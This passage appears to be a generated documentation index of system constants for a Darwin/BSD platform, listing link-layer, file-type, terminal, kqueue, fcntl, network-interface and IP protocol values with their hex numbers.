DLT_A429 (line 262) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 263) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 264) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 265) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 266) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 267) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 268) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 269) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 270) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 271) | DLT_AURORA = 0x7e constant DLT_AX25 (line 272) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 273) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 274) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_HCI_H4 (line 275) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 276) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_CAN20B (line 277) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 278) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 279) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 280) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 281) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 282) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 283) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 284) | DLT_DBUS = 0xe7 constant DLT_DECT (line 285) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 286) | DLT_DOCSIS = 0x8f constant DLT_DVB_CI (line 287) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 288) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 289) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 290) | DLT_EN3MB = 0x2 constant DLT_ENC (line 291) | DLT_ENC = 0x6d constant DLT_ERF (line 292) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 293) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 294) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 295) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 296) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 297) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 298) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 299) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 300) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 301) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 302) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 303) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 304) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 305) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 306) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 307) | DLT_GSMTAP_UM = 0xd9 constant DLT_HHDLC (line 308) | DLT_HHDLC = 0x79 constant DLT_IBM_SN (line 309) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 310) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 311) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 312) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 313) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 314) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 315) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 316) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 317) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 318) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 319) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 320) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_IPFILTER (line 321) | DLT_IPFILTER = 0x74 constant DLT_IPMB (line 322) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 323) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPNET (line 324) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 325) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 326) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 327) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 328) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 329) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 330) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 331) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 332) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 333) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 334) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 335) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 336) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 337) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 338) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 339) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 340) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 341) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 342) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 343) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 344) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 345) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 346) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 347) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 348) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 349) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 350) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 351) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 352) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 353) | DLT_LAPD = 0xcb constant DLT_LIN (line 354) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 355) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 356) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 357) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 358) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 359) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 360) | DLT_LOOP = 0x6c constant DLT_LTALK (line 361) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 362) | DLT_MATCHING_MAX = 0x10a constant DLT_MATCHING_MIN (line 363) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 364) | DLT_MFR = 0xb6 constant DLT_MOST (line 365) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 366) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 367) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 368) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 369) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 370) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 371) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 372) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 373) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NFC_LLCP (line 374) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 375) | DLT_NFLOG = 0xef constant DLT_NG40 (line 376) | DLT_NG40 = 0xf4 constant DLT_NULL (line 377) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 378) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 379) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 380) | DLT_PFSYNC = 0x12 constant DLT_PPI (line 381) | DLT_PPI = 0xc0 constant DLT_PPP (line 382) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 383) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 384) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 385) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 386) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 387) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 388) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 389) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 390) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 391) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 392) | DLT_RAW = 0xc constant DLT_RIO (line 393) | DLT_RIO = 0x7c constant DLT_SCCP (line 394) | DLT_SCCP = 0x8e constant DLT_SITA (line 395) | DLT_SITA = 0xc4 constant DLT_SLIP (line 396) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 397) | DLT_SLIP_BSDOS = 0xf constant DLT_STANAG_5066_D_PDU (line 398) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 399) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 400) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 401) | DLT_TZSP = 0x80 constant DLT_USB (line 402) | DLT_USB = 0xba constant DLT_USB_DARWIN (line 403) | DLT_USB_DARWIN = 0x10a constant DLT_USB_LINUX (line 404) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 405) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 406) | DLT_USER0 = 0x93 constant DLT_USER1 (line 407) | DLT_USER1 = 0x94 constant DLT_USER10 (line 408) | DLT_USER10 = 0x9d constant DLT_USER11 (line 409) | DLT_USER11 = 0x9e constant DLT_USER12 (line 410) | DLT_USER12 = 0x9f constant DLT_USER13 (line 411) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 412) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 413) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 414) | DLT_USER2 = 0x95 constant DLT_USER3 (line 415) | DLT_USER3 = 0x96 constant DLT_USER4 (line 416) | DLT_USER4 = 0x97 constant DLT_USER5 (line 417) | DLT_USER5 = 0x98 constant DLT_USER6 (line 418) | DLT_USER6 = 0x99 constant DLT_USER7 (line 419) | DLT_USER7 = 0x9a constant DLT_USER8 (line 420) | DLT_USER8 = 0x9b constant DLT_USER9 (line 421) | DLT_USER9 = 0x9c constant DLT_WIHART (line 422) | DLT_WIHART = 0xdf constant DLT_X2E_SERIAL (line 423) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 424) | DLT_X2E_XORAYA = 0xd6 constant DT_BLK (line 425) | DT_BLK = 0x6 constant DT_CHR (line 426) | DT_CHR = 0x2 constant DT_DIR (line 427) | DT_DIR = 0x4 constant DT_FIFO (line 428) | DT_FIFO = 0x1 constant DT_LNK (line 429) | DT_LNK = 0xa constant DT_REG (line 430) | DT_REG = 0x8 constant DT_SOCK (line 431) | DT_SOCK = 0xc constant DT_UNKNOWN (line 432) | DT_UNKNOWN = 0x0 constant DT_WHT (line 433) | DT_WHT = 0xe constant ECHO (line 434) | ECHO = 0x8 constant ECHOCTL (line 435) | ECHOCTL = 0x40 constant ECHOE (line 436) | ECHOE = 0x2 constant ECHOK (line 437) | ECHOK = 0x4 constant ECHOKE (line 438) | ECHOKE = 0x1 constant ECHONL (line 439) | ECHONL = 0x10 constant ECHOPRT (line 440) | ECHOPRT = 0x20 constant EVFILT_AIO (line 441) | EVFILT_AIO = -0x3 constant EVFILT_EXCEPT (line 442) | EVFILT_EXCEPT = -0xf constant EVFILT_FS (line 443) | EVFILT_FS = -0x9 constant EVFILT_MACHPORT (line 444) | EVFILT_MACHPORT = -0x8 constant EVFILT_PROC (line 445) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 446) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 447) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 448) | EVFILT_SYSCOUNT = 0x11 constant EVFILT_THREADMARKER (line 449) | EVFILT_THREADMARKER = 0x11 constant EVFILT_TIMER (line 450) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 451) | EVFILT_USER = -0xa constant EVFILT_VM (line 452) | EVFILT_VM = -0xc constant EVFILT_VNODE (line 453) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 454) | EVFILT_WRITE = -0x2 constant EV_ADD (line 455) | EV_ADD = 0x1 constant EV_CLEAR (line 456) | EV_CLEAR = 0x20 constant EV_DELETE (line 457) | EV_DELETE = 0x2 constant EV_DISABLE (line 458) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 459) | EV_DISPATCH = 0x80 constant EV_DISPATCH2 (line 460) | EV_DISPATCH2 = 0x180 constant EV_ENABLE (line 461) | EV_ENABLE = 0x4 constant EV_EOF (line 462) | EV_EOF = 0x8000 constant EV_ERROR (line 463) | EV_ERROR = 0x4000 constant EV_FLAG0 (line 464) | EV_FLAG0 = 0x1000 constant EV_FLAG1 (line 465) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 466) | EV_ONESHOT = 0x10 constant EV_OOBAND (line 467) | EV_OOBAND = 0x2000 constant EV_POLL (line 468) | EV_POLL = 0x1000 constant EV_RECEIPT (line 469) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 470) | EV_SYSFLAGS = 0xf000 constant EV_UDATA_SPECIFIC (line 471) | EV_UDATA_SPECIFIC = 0x100 constant EV_VANISHED (line 472) | EV_VANISHED = 0x200 constant EXTA (line 473) | EXTA = 0x4b00 constant EXTB (line 474) | EXTB = 0x9600 constant EXTPROC (line 475) | EXTPROC = 0x800 constant FD_CLOEXEC (line 476) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 477) | FD_SETSIZE = 0x400 constant FF0 (line 478) | FF0 = 0x0 constant FF1 (line 479) | FF1 = 0x4000 constant FFDLY (line 480) | FFDLY = 0x4000 constant FLUSHO (line 481) | FLUSHO = 0x800000 constant FSOPT_ATTR_CMN_EXTENDED (line 482) | FSOPT_ATTR_CMN_EXTENDED = 0x20 constant FSOPT_NOFOLLOW (line 483) | FSOPT_NOFOLLOW = 0x1 constant FSOPT_NOINMEMUPDATE (line 484) | FSOPT_NOINMEMUPDATE = 0x2 constant FSOPT_PACK_INVAL_ATTRS (line 485) | FSOPT_PACK_INVAL_ATTRS = 0x8 constant FSOPT_REPORT_FULLSIZE (line 486) | FSOPT_REPORT_FULLSIZE = 0x4 constant FSOPT_RETURN_REALDEV (line 487) | FSOPT_RETURN_REALDEV = 0x200 constant F_ADDFILESIGS (line 488) | F_ADDFILESIGS = 0x3d constant F_ADDFILESIGS_FOR_DYLD_SIM (line 489) | F_ADDFILESIGS_FOR_DYLD_SIM = 0x53 constant F_ADDFILESIGS_INFO (line 490) | F_ADDFILESIGS_INFO = 0x67 constant F_ADDFILESIGS_RETURN (line 491) | F_ADDFILESIGS_RETURN = 0x61 constant F_ADDFILESUPPL (line 492) | F_ADDFILESUPPL = 0x68 constant F_ADDSIGS (line 493) | F_ADDSIGS = 0x3b constant F_ALLOCATEALL (line 494) | F_ALLOCATEALL = 0x4 constant F_ALLOCATECONTIG (line 495) | F_ALLOCATECONTIG = 0x2 constant F_BARRIERFSYNC (line 496) | F_BARRIERFSYNC = 0x55 constant F_CHECK_LV (line 497) | F_CHECK_LV = 0x62 constant F_CHKCLEAN (line 498) | F_CHKCLEAN = 0x29 constant F_DUPFD (line 499) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 500) | F_DUPFD_CLOEXEC = 0x43 constant F_FINDSIGS (line 501) | F_FINDSIGS = 0x4e constant F_FLUSH_DATA (line 502) | F_FLUSH_DATA = 0x28 constant F_FREEZE_FS (line 503) | F_FREEZE_FS = 0x35 constant F_FULLFSYNC (line 504) | F_FULLFSYNC = 0x33 constant F_GETCODEDIR (line 505) | F_GETCODEDIR = 0x48 constant F_GETFD (line 506) | F_GETFD = 0x1 constant F_GETFL (line 507) | F_GETFL = 0x3 constant F_GETLK (line 508) | F_GETLK = 0x7 constant F_GETLKPID (line 509) | F_GETLKPID = 0x42 constant F_GETNOSIGPIPE (line 510) | F_GETNOSIGPIPE = 0x4a constant F_GETOWN (line 511) | F_GETOWN = 0x5 constant F_GETPATH (line 512) | F_GETPATH = 0x32 constant F_GETPATH_MTMINFO (line 513) | F_GETPATH_MTMINFO = 0x47 constant F_GETPATH_NOFIRMLINK (line 514) | F_GETPATH_NOFIRMLINK = 0x66 constant F_GETPROTECTIONCLASS (line 515) | F_GETPROTECTIONCLASS = 0x3f constant F_GETPROTECTIONLEVEL (line 516) | F_GETPROTECTIONLEVEL = 0x4d constant F_GETSIGSINFO (line 517) | F_GETSIGSINFO = 0x69 constant F_GLOBAL_NOCACHE (line 518) | F_GLOBAL_NOCACHE = 0x37 constant F_LOG2PHYS (line 519) | F_LOG2PHYS = 0x31 constant F_LOG2PHYS_EXT (line 520) | F_LOG2PHYS_EXT = 0x41 constant F_NOCACHE (line 521) | F_NOCACHE = 0x30 constant F_NODIRECT (line 522) | F_NODIRECT = 0x3e constant F_OK (line 523) | F_OK = 0x0 constant F_PATHPKG_CHECK (line 524) | F_PATHPKG_CHECK = 0x34 constant F_PEOFPOSMODE (line 525) | F_PEOFPOSMODE = 0x3 constant F_PREALLOCATE (line 526) | F_PREALLOCATE = 0x2a constant F_PUNCHHOLE (line 527) | F_PUNCHHOLE = 0x63 constant F_RDADVISE (line 528) | F_RDADVISE = 0x2c constant F_RDAHEAD (line 529) | F_RDAHEAD = 0x2d constant F_RDLCK (line 530) | F_RDLCK = 0x1 constant F_SETBACKINGSTORE (line 531) | F_SETBACKINGSTORE = 0x46 constant F_SETFD (line 532) | F_SETFD = 0x2 constant F_SETFL (line 533) | F_SETFL = 0x4 constant F_SETLK (line 534) | F_SETLK = 0x8 constant F_SETLKW (line 535) | F_SETLKW = 0x9 constant F_SETLKWTIMEOUT (line 536) | F_SETLKWTIMEOUT = 0xa constant F_SETNOSIGPIPE (line 537) | F_SETNOSIGPIPE = 0x49 constant F_SETOWN (line 538) | F_SETOWN = 0x6 constant F_SETPROTECTIONCLASS (line 539) | F_SETPROTECTIONCLASS = 0x40 constant F_SETSIZE (line 540) | F_SETSIZE = 0x2b constant F_SINGLE_WRITER (line 541) | F_SINGLE_WRITER = 0x4c constant F_SPECULATIVE_READ (line 542) | F_SPECULATIVE_READ = 0x65 constant F_THAW_FS (line 543) | F_THAW_FS = 0x36 constant F_TRANSCODEKEY (line 544) | F_TRANSCODEKEY = 0x4b constant F_TRIM_ACTIVE_FILE (line 545) | F_TRIM_ACTIVE_FILE = 0x64 constant F_UNLCK (line 546) | F_UNLCK = 0x2 constant F_VOLPOSMODE (line 547) | F_VOLPOSMODE = 0x4 constant F_WRLCK (line 548) | F_WRLCK = 0x3 constant HUPCL (line 549) | HUPCL = 0x4000 constant HW_MACHINE (line 550) | HW_MACHINE = 0x1 constant ICANON (line 551) | ICANON = 0x100 constant ICMP6_FILTER (line 552) | ICMP6_FILTER = 0x12 constant ICRNL (line 553) | ICRNL = 0x100 constant IEXTEN (line 554) | IEXTEN = 0x400 constant IFF_ALLMULTI (line 555) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 556) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 557) | IFF_BROADCAST = 0x2 constant IFF_DEBUG (line 558) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 559) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 560) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 561) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 562) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 563) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 564) | IFF_NOARP = 0x80 constant IFF_NOTRAILERS (line 565) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 566) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 567) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 568) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 569) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 570) | IFF_SIMPLEX = 0x800 constant IFF_UP (line 571) | IFF_UP = 0x1 constant IFNAMSIZ (line 572) | IFNAMSIZ = 0x10 constant IFT_1822 (line 573) | IFT_1822 = 0x2 constant IFT_6LOWPAN (line 574) | IFT_6LOWPAN = 0x40 constant IFT_AAL5 (line 575) | IFT_AAL5 = 0x31 constant IFT_ARCNET (line 576) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 577) | IFT_ARCNETPLUS = 0x24 constant IFT_ATM (line 578) | IFT_ATM = 0x25 constant IFT_BRIDGE (line 579) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 580) | IFT_CARP = 0xf8 constant IFT_CELLULAR (line 581) | IFT_CELLULAR = 0xff constant IFT_CEPT (line 582) | IFT_CEPT = 0x13 constant IFT_DS3 (line 583) | IFT_DS3 = 0x1e constant IFT_ENC (line 584) | IFT_ENC = 0xf4 constant IFT_EON (line 585) | IFT_EON = 0x19 constant IFT_ETHER (line 586) | IFT_ETHER = 0x6 constant IFT_FAITH (line 587) | IFT_FAITH = 0x38 constant IFT_FDDI (line 588) | IFT_FDDI = 0xf constant IFT_FRELAY (line 589) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 590) | IFT_FRELAYDCE = 0x2c constant IFT_GIF (line 591) | IFT_GIF = 0x37 constant IFT_HDH1822 (line 592) | IFT_HDH1822 = 0x3 constant IFT_HIPPI (line 593) | IFT_HIPPI = 0x2f constant IFT_HSSI (line 594) | IFT_HSSI = 0x2e constant IFT_HY (line 595) | IFT_HY = 0xe constant IFT_IEEE1394 (line 596) | IFT_IEEE1394 = 0x90 constant IFT_IEEE8023ADLAG (line 597) | IFT_IEEE8023ADLAG = 0x88 constant IFT_ISDNBASIC (line 598) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 599) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISO88022LLC (line 600) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 601) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 602) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 603) | IFT_ISO88025 = 0x9 constant IFT_ISO88026 (line 604) | IFT_ISO88026 = 0xa constant IFT_L2VLAN (line 605) | IFT_L2VLAN = 0x87 constant IFT_LAPB (line 606) | IFT_LAPB = 0x10 constant IFT_LOCALTALK (line 607) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 608) | IFT_LOOP = 0x18 constant IFT_MIOX25 (line 609) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 610) | IFT_MODEM = 0x30 constant IFT_NSIP (line 611) | IFT_NSIP = 0x1b constant IFT_OTHER (line 612) | IFT_OTHER = 0x1 constant IFT_P10 (line 613) | IFT_P10 = 0xc constant IFT_P80 (line 614) | IFT_P80 = 0xd constant IFT_PARA (line 615) | IFT_PARA = 0x22 constant IFT_PDP (line 616) | IFT_PDP = 0xff constant IFT_PFLOG (line 617) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 618) | IFT_PFSYNC = 0xf6 constant IFT_PKTAP (line 619) | IFT_PKTAP = 0xfe constant IFT_PPP (line 620) | IFT_PPP = 0x17 constant IFT_PROPMUX (line 621) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 622) | IFT_PROPVIRTUAL = 0x35 constant IFT_PTPSERIAL (line 623) | IFT_PTPSERIAL = 0x16 constant IFT_RS232 (line 624) | IFT_RS232 = 0x21 constant IFT_SDLC (line 625) | IFT_SDLC = 0x11 constant IFT_SIP (line 626) | IFT_SIP = 0x1f constant IFT_SLIP (line 627) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 628) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 629) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 630) | IFT_SONET = 0x27 constant IFT_SONETPATH (line 631) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 632) | IFT_SONETVT = 0x33 constant IFT_STARLAN (line 633) | IFT_STARLAN = 0xb constant IFT_STF (line 634) | IFT_STF = 0x39 constant IFT_T1 (line 635) | IFT_T1 = 0x12 constant IFT_ULTRA (line 636) | IFT_ULTRA = 0x1d constant IFT_V35 (line 637) | IFT_V35 = 0x2d constant IFT_X25 (line 638) | IFT_X25 = 0x5 constant IFT_X25DDN (line 639) | IFT_X25DDN = 0x4 constant IFT_X25PLE (line 640) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 641) | IFT_XETHER = 0x1a constant IGNBRK (line 642) | IGNBRK = 0x1 constant IGNCR (line 643) | IGNCR = 0x80 constant IGNPAR (line 644) | IGNPAR = 0x4 constant IMAXBEL (line 645) | IMAXBEL = 0x2000 constant INLCR (line 646) | INLCR = 0x40 constant INPCK (line 647) | INPCK = 0x10 constant IN_CLASSA_HOST (line 648) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 649) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 650) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 651) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 652) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 653) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 654) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 655) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 656) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 657) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 658) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 659) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 660) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 661) | IN_CLASSD_NSHIFT = 0x1c constant IN_LINKLOCALNETNUM (line 662) | IN_LINKLOCALNETNUM = 0xa9fe0000 constant IN_LOOPBACKNET (line 663) | IN_LOOPBACKNET = 0x7f constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 664) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x400473d1 constant IPPROTO_3PC (line 665) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 666) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 667) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 668) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 669) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 670) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 671) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 672) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 673) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 674) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CFTP (line 675) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 676) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 677) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 678) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 679) | IPPROTO_CPNX = 0x48 constant IPPROTO_DDP (line 680) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 681) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 682) | IPPROTO_DIVERT = 0xfe constant IPPROTO_DONE (line 683) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 684) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 685) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 686) | IPPROTO_EMCON = 0xe constant 